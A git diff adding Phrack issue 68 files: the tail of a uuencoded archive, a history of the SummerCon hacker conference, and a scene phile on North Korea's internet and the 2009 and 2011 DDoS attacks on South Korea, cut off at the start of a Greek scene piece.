+M'`QO/J\JZ\<?594?XPG-Z)_MJNGV)5=!W.4KGU7M'C7?X=7.3+N30"?R]TKM
+M[#:/K>_#V+:R+`O+P)'C\U/YY0R")UQ.,])1@#2)^>NS\Q(&5>(M+^A98XH!
+MOI9Q9*A\4>L;D%5E29=8TO/<96-?!P:FR:?T,@AJ="CIF%`?=]*9P9[6N/GM
+M8-N4/Z9A&'SZ/U!+`0(4``H``````-%>A4`````````````````'````````
+M````$`````````!3-"YP-C@O4$L!`A0`%``"``@`9V_'-I(9)'05&P``L4<`
+M``X``````````0`@````)0```%,T+G`V."]#3U!924Y'4$L!`A0`%``"``@`
+M_:*!0$3GD9N>`0``0P,```\``````````0`@````9AL``%,T+G`V."]G;&]B
+M86PN:%!+`0(4`!0``@`(``JE@4!VK/V$0@,``,\*```3``````````$`(```
+M`#$=``!3-"YP-C@O:&UA8U]M9#4N8W!P4$L!`A0`%``"``@`<Z2!0%Z7NI:J
+M#```32D```X``````````0`@````I"```%,T+G`V."]M9#4N8W!P4$L!`A0`
+M%``"``@`[**!0.+_SLVR`@``S04```P``````````0`@````>BT``%,T+G`V
+M."]M9#4N:%!+`0(4`!0``@`(`+E>A4!!P_$XX"P``(B@```-``````````$`
+K(````%8P``!3-"YP-C@O4S0N8W!P4$L%!@`````'``<`H`$``&%=````````
+`
+end
+
+---[ EOF
diff --git a/phrack68/18.txt b/phrack68/18.txt
new file mode 100644
index 0000000..de16422
--- /dev/null
+++ b/phrack68/18.txt
@@ -0,0 +1,247 @@
+                              ==Phrack Inc.==
+
+                Volume 0x0e, Issue 0x44, Phile #0x12 of 0x13
+
+|=-----------------------------------------------------------------------=|
+|=----------------------=[ 25 Years of SummerCon ]=----------------------=|
+|=-----------------------------------------------------------------------=|
+|=---------------------------=[ by Shmeck ]=-----------------------------=|
+|=-----------------------------------------------------------------------=|
+
+It's hard to believe that 2012 marks the 25th anniversary of SummerCon. In
+the American hacking landscape, SummerCon remains the seminal conference
+from which all others are modeled. In those early days, interactions
+between hackers took place through BBSes, as shout-outs in assorted
+textfiles, on telco voice bridges, and in the pages of Phrack and 2600. For
+the most part, these interactions were all mediated through some kind of
+communications infrastructure. SummerCon was an opportunity to change that.
+
+In the 1980s, informal gatherings of hackers had begun to spring up all
+over the place in America. The European scene was well-organized, with
+groups like the Chaos Computer Club holding an annual congress of hackers
+as early as 1984. 
+
+There are various theories about why Europe organized more quickly than
+America. America developed a strong counterculture in the 1960s and 1970s,
+including an enthusiastic phreaking movement dating back to the early
+1970s. Well-known anarchist and Chicago Seven conspirator Abbie Hoffman,
+along with Al Bell, a well-known telephony enthusiast, launched the first
+phreak magazine, YIPL: Youth International Party Line in 1971. YIPL became
+TAP, based out of New York. Though Americans were enthusiastic, TAP found
+an eager European audience, and Dutch and German activists carried the
+torch and pushed the boundaries of phreaking in the 1970s. Those phreaks
+were readily absorbed into the ranks of an already strong and
+well-established anti-authoritarian movement in Europe. Large-scale
+meetings, complete with technical demonstrations were the logical next
+step, so the first big hacker conference, Chaos Computer Congress, took
+place in Hamburg in 1984.
+
+American hackers remained active during that period, but physical meetings
+remained elusive. Nevertheless, something like a tipping point for the
+American hacking scene must have occurred in the summer of 1987. On June 5
+of that year, the first 2600 meeting was held in New York City. Only two
+weeks later, in St. Louis, a small cadre of people who mostly knew each
+other from exchanges on Metal Shop BBS and through Phrack profiles, met at
+the Executive International Best Western to embark on a totally new way to
+advance the American hacking agenda. The first SummerCon set the stage for
+the way subsequent hacker conferences would be held. To this day PumpCon,
+HoHoCon, DEFCON, and HOPE stick to the same formula.
+
+Its organizers wanted to foster the physical interaction in meatspace,
+eschewing the phosphorescent glow of their CRTs to hold a party like none
+other. Mostly, if the reports from early editions of Phrack are to be
+believed, though, it was to have a good time. SummerCon has always held its
+primary goal as forging friendships, because that's how real dialogue and
+information exchange happens. Yes, there were technical talks. That first
+SummerCon in 1987 included a long list of technical discussions, but
+because it was a small gathering, the agenda was ad hoc and seemingly
+freeform. 
+
+Most of the technical discussions centered on things that are pretty far
+outside modern mainstream infosec discourse: BBSes, fiber optics, and
+methods of blowing 2600 Hertz headlined the proceedings. In fact, the
+attendees had a hard time getting started, not really knowing each other or
+how to begin. But because everyone in attendance had some sort of technical
+background, these purely technical discussions got people talking to each
+other, which led to drinking, which led to partying, which, ultimately
+helped the attendees forge long-lasting relationships with each other. It's
+how cons have worked ever since.
+
+The success of that first SummerCon naturally implied that another one
+would be held the following year. Its organizers made a last-minute
+decision to hold another one. Like modern incarnations of SummerCon, the
+organizers dithered over details like location, letting inertia play a
+significant role. While New York City was one possible contender, it was
+held in St. Louis again. 
+
+SummerCon '88 was a controversial one. The technical discussions came a
+little more easily, and the attendees seemed a little more comfortable,
+inviting outsiders into their ranks. But one attendee, Dale Drew, using the
+handle "The Dictator",  was actually an informant working with the Secret
+Service. He helped government agents videotape the proceedings through a
+two-way mirror in his hotel room. This video evidence was eventually used
+to indict conference organizer Knight Lightning (the nom de hack of Phrack
+founder Craig Neidorf) on a federal count of criminal conspiracy as a part
+of his now-infamous E911 criminal trial. Though the case against Neidorf
+eventually fell apart, federal interest in SummerCon would remain an
+ongoing theme for years to come. Other conferences have capitalized on
+SummerCon mainstays like "Hunt the Fed", now immortalized as DEFCON's "Spot
+the Fed" contest.
+
+There was a SummerCon in 1990, but a wide federal dragnet for computer
+crime and Knight Lightning's federal trial tainted it. Perhaps the most
+chilling reminder of a bad era exists in the announcement for a
+Christmastime event in Houston called XmasCon, who stated that their event
+would "replace the painful memories of SummerCon'90 (SCon'90? What do you
+mean? there was a SummerCon this year? HA. It surprised me too)." Clearly,
+these were bad times in the hacker community.
+
+In 1991, the freshly acquitted Knight Lightning rebranded SummerCon as
+"CyberView," because he did not want to trigger any associations with the
+previous event. Bruce Sterling's comprehensive report (Phrack 33:10,
+http://www.phrack.org/issues.html?issue=33&id=10#article) included a
+rationale for the new, if short-lived name. "The convention hotel, a seedy
+but accommodating motor-inn outside the airport in St Louis, had hosted
+SummerCons before. Changing the name had been a good idea. If the staff
+were alert, and actually recognized that these were the same kids back
+again, things might get hairy." In what can only be described as a
+SummerCon miracle, a St. Louis swingers' group simultaneously occupied the
+conference hotel. As with every SummerCon, booze was a factor.
+
+SummerCon 92 saw a dramatic increase in the number of participants, with 73
+reportedly in attendance. Summercon 93 was the last year a SummerCon took
+place in St. Louis. Summercon 95 marked a changing of the guard, with the
+event taking place in Atlanta, hosted by Erik Bloodaxe and his LoD
+colleagues. Over 200 hackers came; several were arrested. The following
+year, SummerCon 96 moved to Washington, DC. 
+
+Periodically moving the conference became a ritual to prevent the event
+from getting too stale and to ensure that a willing hotel could be found,
+since SummerCon had a reputation of being a rowdy conference. The move to
+Washington, D.C. offered an easy venue for members of the East Coast hacker
+community; members of L0pht came in from Boston, hackers from Pittsburgh
+had a simple commute, and the NYC scene was well represented. The local law
+enforcement community was in full force as well, with several raids taking
+place during the event.
+
+During that time period, the organizers of SummerCon were losing enthusiasm
+for running the event. It is a thankless job, and requires coordinating a
+tremendous number of people, places, and event staff, all while keeping law
+enforcement officials at bay. During Summercon 97 in Atlanta, a stalwart of
+the DC hacking community going by the handle Clovis convinced the current
+organizers to transfer the domain name to him so that he could take over
+the organizational aspects of the conference. It was a relief to the
+current organizers, who were frankly happy to be done with the annual
+headache. 
+
+In 1998, Clovis, leaning heavily on his younger brother for organizational
+support, threw SummerCon in Atlanta. For the next three years, SummerCon
+would be held in Atlanta, though SummerCon 2000 was notable because the
+hotel that was slated to host it conveniently lost contracts for the event
+the day before it was to take place, leaving Clovis no rooms for technical
+discussions. The nonplussed attendees set up shop in the Omni CNN Center
+Hotel bar, where ad hoc presentations took place, much to the consternation
+of hotel guest who did not expect to get a dose of information security
+discourse over their cocktails. The hotel that originally objected to
+hosting a hacker conference, did not mind the steady stream of bar sales
+one bit.
+
+Clovis had ambitious plans for SummerCon. For 2001, envisioned a global
+conference, which would draw an audience from around the world. He thought
+Amsterdam would be a good location, and looked into bulking up the
+technical backend of the event. For the first time SummerCon would be shown
+live through a RealStream video server to anyone who wanted to watch.
+
+It was daunting. Everything was expensive. Clovis' younger brother had to
+figure out a mountain of customs paperwork to ship all the t-shirts and
+conference badges overseas. In short, every part of SummerCon 2001 was an
+enormous headache, but in the end it was a fantastic event.
+
+About 200 attendees descended on Amsterdam to try an American-style hacker
+conference. It was very different than the Chaos Computer Club congresses,
+and nothing at all like the Dutch hacking camp HAL. Many attendees didn't
+understand why it was held at such an expensive hotel. But the global
+breadth of attendees and speakers was impressive, and it was generally
+considered to be a successful conference by all who attended or watched
+online. The hotel, though pricey, was incredibly easy to work with and
+provided a safe, enjoyable environment in a tourist-friendly part of
+Amsterdam.
+
+But Clovis' brother, weary from filling out customs forms, was not so
+enamored with the idea of doing SummerCon overseas again, and so SummerCon
+2002 took place in Washington, D.C. Unlike the affable and easy-going Dutch
+hotel support staff a year prior, the sales director of the Renaissance
+Washington D.C. had little patience for the SummerCon organizers. Not
+mincing words, she announced to Clovis and his staff, "I know about you
+guys. I know about hacker conferences. If anything happens at this hotel,
+any kind of funny business, I will throw you all out. We have Presidents of
+the United States here. I will throw you out." This was six hours before
+the conference was slated to begin. In spite of her concerns, the
+conference was successful, the hotel bar did brisk business, and nobody got
+arrested. 
+
+SummerCon enjoyed a stand in Pittsburgh for two years where Redpantz became
+a member of the planning committee and began to emcee. In these years,
+SummerCon began to select venues based on how agreeable the bar staff was,
+because, all things being equal, SummerCon is, in the words of the noted
+hacker X, "also about drinking a lot of beer." There were several alcohol
+related incidents in Pittsburgh. One of the organizers was cited by the
+Pittsburgh Police Department for "simulating a sex act," an incident that
+he has never lived down. It was in this time period that members of the FBI
+Cyber Division began to actually offer presentations at SummerCon. If you
+can't beat 'em, join 'em. 
+
+Austin was the site of SummerCon 2005. Internal political squabbling
+amongst the organizers and the lack of a clear promotional plan for
+SummerCon meant that attendance was very low-perhaps even lower than the
+first SummerCon. It was a boozy event and had plenty of quality technical
+discussions, but only a few people showed up, including some very nice
+individuals from San Antonio. Luckily, the hotel was also backed with
+bikers from the annual Republic of Texas motorcycle rally, and everyone was
+down to party.
+
+Nevertheless, the organizers knew it was time to press the reset button,
+and a select group was invited to SummerCon 2006 to address the ongoing
+viability of the event. The organizational core agreed that the next three
+years should be in Atlanta, with every effort take to rebuild the
+reputation of SummerCon. That effort to rejuvenate the reputation as the
+hacker conference with the highest level of technical expertise, coupled
+with the heaviest intake of alcohol per attendee was well received by the
+organizational core and future attendees. It was an old formula, and a
+return to our roots: offer great presentations to get the conversation
+going, and keep everyone as drunk as possible. 
+
+SummerCons in Atlanta were predictably rowdy; in 2007 Billy Hoffman did his
+best to finish his presentation, and slurred the words, "If I'm not making
+any sense ya'll just throw a shoe at me or something." Immediately, an
+attendee threw a shoe that barely missed the staggering speaker, making a
+loud WHUMP as it struck the projection screen. "Well, okay then..." Billy
+replied, as he continued his lecture. The SummerCon organizational staff
+believes that this exchange was the framework for an event that transpired
+in Iraq in 2008, when an angry man threw his shoes at a surprised President
+George W. Bush. 
+
+When SummerCon moved to New York City in 2010, it had a reputation as a
+technical smorgasbord and a relentless booze-fest, which, honestly, is a
+perfect combination. There are very few things you can do to improve on
+that formula, but the SummerCon organizers found a way, by inviting a
+burlesque troupe to participate in event planning and hosting an after
+party. 
+
+Being located in New York City made the event to heavy-hitters in the
+security industry, and the technical aspects of the conference expanded in
+line with the party dynamic. In 2011, the organizers accepted some
+sponsorship money, which permitted them to invest more heavily in the
+presentation side of the event, flying in speakers from far-flung and
+exotic places like California and Michigan. It also meant that the after
+party was more outrageous, and was featured as an "Event of the Week" in
+the local events newsletter "Time Out New York."
+
+There are few things as dependable in the hacking world as SummerCon.
+Though it has evolved from a small, invite-only gathering to a large,
+structured conference, it has never lost sight of the importance of its
+mission: bringing together the brightest minds in information security for
+the best party of the year. Raise your glass, and toast another 25 years of
+Summercon!
+
+[EOF]
diff --git a/phrack68/19.txt b/phrack68/19.txt
new file mode 100644
index 0000000..e6008e6
--- /dev/null
+++ b/phrack68/19.txt
@@ -0,0 +1,880 @@
+                              ==Phrack Inc.==
+
+                Volume 0x0e, Issue 0x44, Phile #0x13 of 0x13
+
+|=-----------------------------------------------------------------------=|
+|=----------------------=[ International scenes ]=-----------------------=|
+|=-----------------------------------------------------------------------=|
+|=------------------------=[    By Various     ]=------------------------=|
+|=------------------------=[ <various@nsa.gov> ]=------------------------=|
+|=-----------------------------------------------------------------------=|
+
+In this issue we are glad to have an amazing scene phile about Korea. You
+may find that it is a bit different from the usual scene philes, but the
+content will reward you. The author gives us information that is hard to
+come by and insight that illuminates widely believed misconceptions about
+Korea. We also have the second part of the Greek scene phile that covers
+interesting stories from that country's past. We know that Greece goes
+through tough times and we hope it will make people reflect on the
+situation there.
+
+Trying to define what 'a scene' is, it's not unlike trying to define what
+'the Underground' is. Perhaps it is that fleeting moment where you feel a
+connection with something. A connection that transcends physical
+limitations and relies only on interest and passion for, well, for anything
+really.
+
+The definition of the word 'scene' has changed quite a lot. Some years ago
+the word 'scene' had a geographical connotation. That's clearly no longer
+the case. Scenes are becoming increasingly, and thankfully, untethered from
+physical boundaries. That's not really something new, but it has changed
+the way most scenes are organized and operate.
+
+Given that physical boundaries no longer are the central defining factor of
+scenes, should Phrack continue to publish scene philes of specific
+countries? Maybe the next logical step is to focus on scenes that are
+defined by field, topic or interest. Maybe Phrack's 'International Scenes'
+section should be changed to simply 'Scenes' and present overviews of less
+known sub-scenes or communities built around specific interests.
+
+Gentle reader, what are your thoughts?
+
+                                        -- The Phrack Staff
+
+
+                                    ---
+
+
+                            Some Stories in Korea
+
+
+
+1 - Introduction
+
+2 - Internet of North Korea
+
+3 - Cyber capabilities of North Korea
+
+4 - Attacks against South Korea
+  4.1 - 7.7 DDoS attack
+  4.2 - 3.4 DDoS attack
+
+5 - Who are attackers?
+
+6 - Some prospects
+
+7 - References
+
+
+
+--[ 1 - Introduction
+The Korean Peninsula has been divided into two countries for more than
+sixty years. With the ideological dispute of left and right wings that must
+have been one of the biggest reasons, the political, economic, geographic,
+and military factors also played an important role here. It is true that
+this division system may be affected by the political, economic, and
+military purpose of the two Koreas, neighboring countries, and their
+allies.
+
+This situation has caused many tragedies to the people of two Koreas, and
+has made a various types of tension factors like forcing North Korea to
+develop nuclear weapons to keep her system in the changing flow of the
+world. Unlike the past whose main element of conflicts came from
+ideological one, some large movements trying to maintain their interests
+dominate the situation of the peninsula.
+
+Over the past decade, the tension between South Korea and North Korea has
+been alleviated thanks to the Sunshine Policy during the regime of two
+progressive governments. However, after the present ruling party
+representing conservative value took over the regime again, the tension
+relationship began once again and there were some physical conflicts. It
+will be almost impossible to get over this situation only with the
+intention and endeavor of two Koreas, because there are so many
+stakeholders.
+
+This article will mainly focus on the internet and cyber capabilities of
+North Korea which seem to be not widely known to people, and some attacks
+against South Korea. So, this will make some differences from the
+traditional Phrack scenes. But I think the differences don't come from
+contents but form.
+
+
+--[ 2 - Internet of North Korea
+It is said that the internet of North Korea was introduced in the early
+1990s. Mainly because of internal political reasons, the internet has been
+maintained in the form of intranet.
+
+In January 1997, North Korea opened the first web site of hers, kcna.co.jp
+in Japan and opened dprkorea.com which was for business in February 1999.
+And then NK opened the web site, silibank.com for international e-mail
+relay. Interestingly, whois lookup will show you that the e-mail account of
+Technical Contact of this domain is gmail. It is known to gain access to
+this e-mail relay system is blocked in South Korea. The service is
+available only to foreigners who joined the paid membership, and people and
+companies of NK registered in the system.[1] The e-mail exchange with
+foreigners are allowed but it is said NK authorities check the contents, so
+the privacy of information will not be guaranteed.
+
+The internet access from inside of NK to outside is very limited, but the
+intranet connection built inside of NK is active. In October 2002, the
+building of intranet network which allows connection from all areas of NK
+was completed. It is called `Kwangmyoung' and started as a research system
+of scientific knowledge materials. It is known that the access to outside
+using this intranet system is impossible.
+
+However, DPS(Department of Postal Service, `Chesinseong' in Korean) of NK
+hires and manages internet access lines in Beijing of China for their use.
+It is possible to connect to outside through this internet line. But it is
+not freely available to all NK people. There are some people who guess
+there are special lines dedicated only to Communist Party and its army in
+addition to this line. But any proven materials or information through the
+technical identification has not been publicly offered yet.
+
+NK has been expanding her commercial web sites for the sake of economic
+interests and system propaganda, and most of them use servers located in
+foreign countries. It seems that the web sites opened in the early 2000s
+have been changed and even disappeared. This may be because NK got a
+permission for her to use her national domain `kp' from ICANN(Internet
+Corporation for Assigned Names and Numbers) on September 11, 2007. NK has
+been opening additional web sites by using kp and will add more. KCC(Korea
+Computer Center) was chosen as a NK internet address management authority.
+It seems that NK will open her internet system to the world when she
+establishes security system and policy by herself, and can control the
+internet use of people.
+
+The access to the NK web sites for system propaganda like naenara.com.kp
+and star.edu.kp is not permitted in South Korea but it is possible for us
+to gain access by using Tor and proxy servers. Some of web sites operated
+directly in NK were known in the past, but they were accessible through not
+domain address system but IP address. However, it is not sure they are
+operated now or they are accessible only from specific regions.
+
+NK also makes use of SNS services like twitter(@uriminzok) mainly for
+propagating her system, giving news about NK, and criticizing South Korea.
+
+
+--[ 3 - Cyber Capabilities of North Korea
+It was the magazine "Shindonga"(November 2005) and `2005 Defense
+Information Security Conference' that introduced cyber capabilities of NK.
+A related news article about the conference contains the following part,
+"The capability of NK hackers is similar to CIA's."[2] But the main parts
+of this article were introduced without objective data, so they were not
+supposed to be reliable facts.
+
+NK Intellectual Solidarity which consists of NK defectors having a
+right-wing inclination insists that the scale of NK cyber hacker troop has
+been on the increase to the level of 3,000 people.[3] But this is not
+confirmed by objective data, so the confidence level is very low.
+
+DigitalTimes cited American experts, "NK cultivates more than 100 hackers
+centering around Pyongyang Automation University(Mirim University in the
+past) every year, and they have capabilities to hack Pacific Command and
+U.S. mainland computer systems."[4] We can easily think that the world is
+connected with internet, so the physical distance between U.S. and NK is
+not an obstacle at all. If the computer systems of U.S. are not so secure,
+even novice hackers can compromise them.
+
+In the web site of Nosotek which is "the first western IT venture in NK",
+we can find the following expression, "software engineers are selected from
+the mathematics elite and learn programming from the ground-up, such as
+assembler to C#, but also Linux kernel and Visual Basic macros".[5] From
+this, we can see indirectly there are outstanding programmers who have
+talents to be hackers.
+
+In the case of Kim Il-Sung University, students have to take the courses of
+high mathematics and programming regardless of their majors. The university
+developed the following software: Intelligent Locker(Hard Disc protection
+program), Worluf Anti-virus(anti-virus program), SIMNA(simulation and
+system analysis program), FC 2.0(C++ program development tool). From this,
+we can know that NK also conducts hacking and security research.[6]
+
+It seems quite natural that we can easily judge there are hacker troops in
+NK in this kind of network age. NK may cultivate hackers for her defense.
+But we don't have to overstate or underestimate the capabilities of NK. We
+should be objective more thoroughly when data is not enough for correct
+judgment. Rational and reasonable policy making and practice come from
+objective data and judgement based on it.
+
+NK should also remember that her web sites, servers, and network can be
+compromised, propagate malicious codes, and be used as intermediates. The
+more NK opens, the more she will be attacked. The attackers will be an
+organization or a country for the sake of its political and military
+purposes, hacker group for hacktivism, and script kiddies for fun.
+
+
+--[ 4 - Attacks against South Korea
+There were two big attacks against South Korea. One is 7.7 DDoS attack(at
+first, this attack started against U.S. on July 4, 2009, but led to the
+attack against South Korea on July 7, so we call this `7.7 DDoS' attack in
+Korea.). The other is 3.4 DDoS attack on March 4, 2011.
+
+--[ 4.1 - 7.7 DDoS attack
+The first attack of 7.7 DDoS began on July 4, 2009(Independence Day of
+U.S.) and lasted for two days. The targets of this attack were 26 important
+web sites of U.S. including Amazon, FAA, NASDAQ, NSA, White House. But from
+the second attack(July 7 to 8), 13 web sites of Korea were added to the
+target list. Administration, congress, portal, media, financial
+institutions were included in the list. At this time, Chinese hackers were
+suspected to be attackers.
+
+From the third attack(July 8 to 9), there were some changes in the target
+list, and the existing zombie PCs were not used any more. It seems that the
+existing zombie PCs were blocked and could be no longer available for the
+next attack. One of the interesting things is that there were some
+government organizations which establish measures to defend against attacks
+and security companies, major portal sites giving e-mail services in the
+target list. From this time, NK was suspected to have done the attack. At
+least, some of South Korea's conservatives wished to believe this for their
+political profits.
+
+The final attack(July 10) ended destroying data of zombie PCs which were
+infected with malicious code for attacks. However, the attacker was not
+identified. C&C(Command & Control) servers from numerous countries were
+used for the attack. At that time, South Korea was not prepared for this
+kind of big attack. Thus, South Korea couldn't avoid a confusion from the
+attack for three days.
+
+As a result, this attack made South Korea establish various policies of
+preparedness against DDoS attack. Some hackers of South Korea designed ways
+to cure zombie PCs using C&C servers of attackers as well as some ways of
+counterattack.
+
+--[ 4.2 - 3.4 DDoS Attack
+Almost two years after 7.7 DDoS attack, a similar attack occurred at 10:00
+in the morning on March 4, 2011. Like 7.7 DDoS attack, it contained
+political intentions. But the techniques of attack were more advanced. The
+targets were mainly the web sites of major national infrastructures of
+South Korea. The web sites of legislative, judicial, administrative,
+military, diplomatic, financial organizations, and intelligence agencies,
+police, portal, transportation, power system were included.
+
+The attacker used HTTP GET Flooding, UDP Flooding, ICMP Flooding, and more
+than 80% was HTTP GET Flooding. And more than 110,000 zombie PCs and 700
+C&C servers from 72 countries were used for attack.[7] The attacker used
+P2P web sites to spread malicious codes.
+
+After the attacker realized that his attack had been detected(the P2P web
+sites were known and blocked) through the countermeasure, he added new
+commands to the malicious codes. This is a different part from the past
+attack. When new attacks started, the configuration of malicious code was
+changed, and new files were added. Security experts faced new challenges
+and needed more time to analyze them. The ending time of attacks was not
+specified clearly in the configuration file. And the host file of system
+was modified to prevent the update of anti-virus programs. And encryption
+techniques were used to disturb analysis.
+
+However, new defense systems which had been established since 7.7 DDoS
+attack were applied and despite more advanced techniques of attack, the
+damage decreased. One day before the attack, ASD(AhnLab Smart Defense)
+system collected malicious codes which would be used for attack and
+analyzed the code. Through this analysis, the exact time and targets of
+attack came to be known, and more effective response was possible.
+
+South Korea has already established some important response systems since
+7.7 DDoS attack. The typical examples are ASD of AhnLab and DDoS Shield of
+KISA. As I said, ASD system can detect attack before it occurs by
+collecting malicious codes and analyzing them. DDoS Shield system detects
+attacking traffics and relays normal traffics to their destinations and
+throws away abnormal attacking traffics through DNS record modification. Of
+course, the cooperation system of various related organizations and
+security companies was established elaborately. In this respect, these two
+attacks made South Korea build new defense systems and brought the
+development of the security industry.
+
+This attack was so political but the attacker didn't reveal his exact base
+intentions. But it is clear that the attacker wanted to test his techniques
+of attack and judge the response capabilities of South Korea.  The attacker
+might realize what kinds of things he needs for his next successful attack.
+Maybe, we can judge the real capabilities of the attacker through the next
+attack.
+
+
+--[ 5 - Who are attackers?
+One of the questions which people are curious about is "who are
+attackers?". This is an important question related with political and
+military purposes. In conclusion, the judgement through the technical
+analysis about the question, `who are attackers?' has not been disclosed to
+the public. In a nutshell, the attacker may be a guy, a group, an
+organization, or a country that holds its ground against opponents and so
+has an obvious justification to attack or wants to seize the hegemony of
+internet world.
+
+For whom are not interested in this kind of general and abstract
+conclusion, following judgements and the grounds can be given. This is
+based on a simple presumption, so you'd better not take it too seriously.
+
+The first ground of presumption that NK could be a probable attacker is
+GNP(Grand National Party) and Chosun Ilbo were included in the attack
+target list. GNP is the ruling party of South Korea and its philosophical
+background is based on conservatism, and it is hostile to NK from a
+political standpoint. Chosun Ilbo is also a leading conservative media and
+has a hostile point of argument to NK. The contention of Chosun Ilbo has
+not always been rational and showed us it may manipulate public opinion for
+its profit. Of course, people of progressive idea are not always friendly
+to NK without any condition. The fact that these two targets which can be
+hostile to NK for their political reasons are included in the list makes us
+guess the attack might be conducted by NK. This judgement came from the
+special situation of the Korean Peninsula.
+
+The target list of 3.4 DDoS attack contains a particular web site. It is
+Dcinside, a common community web site. If the attack had been for political
+purpose, the web site would have had no reason to be in the list. By the
+way, on January 5, 2011, some posts to blame for NK's leaders were
+registered in one of NK web site, uriminzokiri.com which the Committee for
+the Peaceful Reunification of the Fatherland manages to propagate NK's
+political system. On January 8, 2011, the twitter account of NK(@uriminzok)
+was compromised and attackers posted some critical comments about NK and
+the leader Kim Jeong-il, Kim Jeong-eun. Some members of Dcinside insisted
+they did. After two months later, Dcinside was in the list of target. This
+is the second ground of presumption.
+
+Police of South Korea presumed the attack of NK because the source IPs of
+attack might have been DPS's which DPS of NK hires in China. But one police
+concerned told a press, "It is difficult to make clear the exact entity
+about the main body of this DDoS attack."[8] This shows us that the
+judgement of police might not be clear. To ensure a clear evidence, police
+told the press they would do a cooperative investigation with China police,
+but the results of any cooperative investigation has not been released yet.
+Because only small number of people possess some sensitive information,
+various conspiracies seem to appear.
+
+Some people who think the attack didn't come from NK suggest the
+followings: if NK had a perfect attack plan and was not an idiot, they
+would not revealed the IP addresses she hired in China with causing
+political problems. On the contrary, the third force who is familiar with
+the tension of two Koreas and want to use this situation for its profit
+rather conducted the attack.
+
+A lot of detailed technical analysis has been published many times in korea
+since the two attacks. In the technical documentations and presentations,
+the experts of South Korea didn't specify the source of the attacks because
+they are afraid of arbitrary interpretation by some people. South Korea is
+a divided country and any information can be interpreted arbitrarily by
+some people depending on their political or ideological purposes. In the
+white paper, "Ten Days of Rain" of McAfee, we can find this part, "This may
+have been a test of South Korea's preparedness to mitigate cyber attacks,
+possibly by North Korea or their sympathizers."[9] This has been quoted
+mainly by some conservative organizations and medias for their political
+purposes to confirm the attack of NK.
+
+
+--[ 6 - Some prospects
+Some phenomena(for example, making zombie PCs regularly) of the preparation
+for a powerful DDoS attack has been detected. I am not sure this is the
+extension of the past and conducted by the past attackers. However, if a
+new attack occurs, the attacker will test new techniques and South Korea
+will inspect her defense systems. Of course, South Korea will also be able
+to have a chance to establish a new defense system and more advanced attack
+techniques.
+
+South Korea has carried out more than material preparations through the
+various forms of cyber attacks. This is because South Korea government and
+companies realized the importance of hackers' help. This started from
+getting over the wrong awareness about hackers in the past. However, when
+they looked for good hackers who could help them, they realized that there
+were not so many hackers as they wanted. So, the need of running programs
+that can foster good hackers has begun to rise.
+
+About ten years ago, the hackers of South Korea organized communities and
+hacking teams by themselves, and proceeded various researches and
+discussions. At that time, they had strong desire for knowledge and pure
+research, and their findings were shared freely with little thought of
+money. And they didn't use their knowledge for the purpose of financial
+crime. But the government and companies considered hackers as criminals.
+Sometimes, police tried to arrest hackers for their own profits and blocked
+their activities. In this kind of oppressive situation, hacker had to stop
+their growth momentarily. Consequently, this led to the retreat of cyber
+defense capabilities of South Korea. Hackers can't post an exploit code in
+a web site. Because the related law defines 'hacking' too comprehensively,
+so it is still illegal to post an exploit code in an open web site in South
+Korea.
+
+Watching various cyber attacks for the purpose of political and financial
+reasons around the world, the government and companies of South Korea
+realized that bringing up hackers is closely linked to the defense of
+country and profits of companies. So, they run some hacking contests to
+find good hackers and support some hacking and security clubs of
+universities. These kinds of action are still not so well formed to the
+level of systematically perfect process, but these fostering programs are
+expected to be proceeded in more concrete shape through various cyber
+attacks.
+
+Of course, the hackers of South Korea have tried to prove the value of
+their existence and to grow up by themselves without any help of government
+and companies. For instance, they have participated in the finals of DefCon
+CTF since 2006. In 2006, 'East Sea'(This refers to the territory of Korea)
+team went to the final of DefCon CTF and this was the first time for a
+foreign team to take part in it. And this led to the organization of one
+team for DefCon CTF which consisted of some members of leading hacking
+teams of South Korea. This was helpful to correct the wrong awareness of
+media about hackers. And some hacking and security conferences have been
+held every year by hackers. Even some hackers take part in the penetration
+test projects for government. The hackers of South Korea now prove their
+contribution and existence value through these activities.
+
+There will be two important elections, a general election and a
+presidential election in South Korea next year. And some political attacks
+can be expected regardless of the types of attack.If some large-scale
+attacks occur again next year, some people will likely assert it as a
+conduct of NK even if it is not by NK. Some politicians of two Koreas fell
+under suspicion of bringing unrest on the peninsula intentionally to
+achieve their political goals at the time-sensitive period.
+
+We can easily anticipate various forms of attack to occur continuously if
+the division state of two Koreas remains, and new strains occur, or if
+someone or country needs them for profit. Currently, one of the best
+solutions for this problem is to relieve the political tensions through the
+promotion of common interests of surrounding countries of the Korean
+Peninsula and to achieve the cooperation relationship. The stability of the
+Korean Peninsula can contribute to the peace of the world as well as East
+Asia owing to the close connection of countries.
+
+
+--[ 7 - References
+[1] Seong-jin Hwang, Young-il Gong, Hyun-ki Hong, Sang-ju Park, "Report
+    about Cooperation  in Broadcast Communications Between South Korea and
+    North Korea"
+[2] http://www.sisaseoul.com/news/quickViewArticleView.html?idxno=1154
+[3] http://news.chosun.com/site/data/html_dir/2011/06/01/2011060100834.html
+[4] http://www.dt.co.kr/contents.html?article_no=2011070102010251746002
+[5] http://www.nosotek.com
+[6] Chan-mo Park, "Software Technology Trends of North Korea"
+    http://www.postech.ac.kr/k/univ/president/html/speeches/20030428.html
+[7] http://www.ahnlab.com/kr/site/securityinfo/newsletter/magazine.do
+[8] http://www.seoul.co.kr/news/newsView.php?id=20110407008034
+[9] McAfee, "Ten Days of Rain - Expert analysis of distributed
+    denial-of-service attacks targeting South Korea"
+    http://dok.do/srVOcq
+
+
+---------------------------------------------------------------------------
+
+
+What's past is prologue
+anonymous underground greek collective - anonymous_gr@phrack.org
+
+
+----[ Introduction
+
+First things first. This is the second part of the previous scene phile on
+the Greek underground scene [GRS]. Although the primary authors are the
+same as the first part, this time many people contributed information,
+stories, facts and even whole paragraphs of text. We were positively
+surprised by the response and the attitude of the community that decided to
+help us in order to make this second part better. Hence the new authorship
+details. Also, the email alias from above is now forwarded to the people
+that helped.
+
+The truth is that we had a great time receiving irrelevant flames by
+people who didn't even read the first two paragraphs of our previous scene
+phile. In a struggle to avoid future unfortunate comments, we would like
+to stress the fact that we are not capable of talking about every aspect
+of the Greek scene in just a few paragraphs. In fact, space is not the
+only problem. Privacy is a fundamental characteristic of all scenes. There
+are people who don't want to publish or openly talk about their actions,
+and there are certain stories/facts that we are not aware of. That said,
+we believe that the following text covers, not all, but a fair amount
+of the history of the Greek scene. If you don't comprehend the previous
+sentences, then maybe you should try reading something else. Or maybe
+try writing/producing something yourself, huh? How about that?
+
+We would also like to remind you that we will once again try to refrain
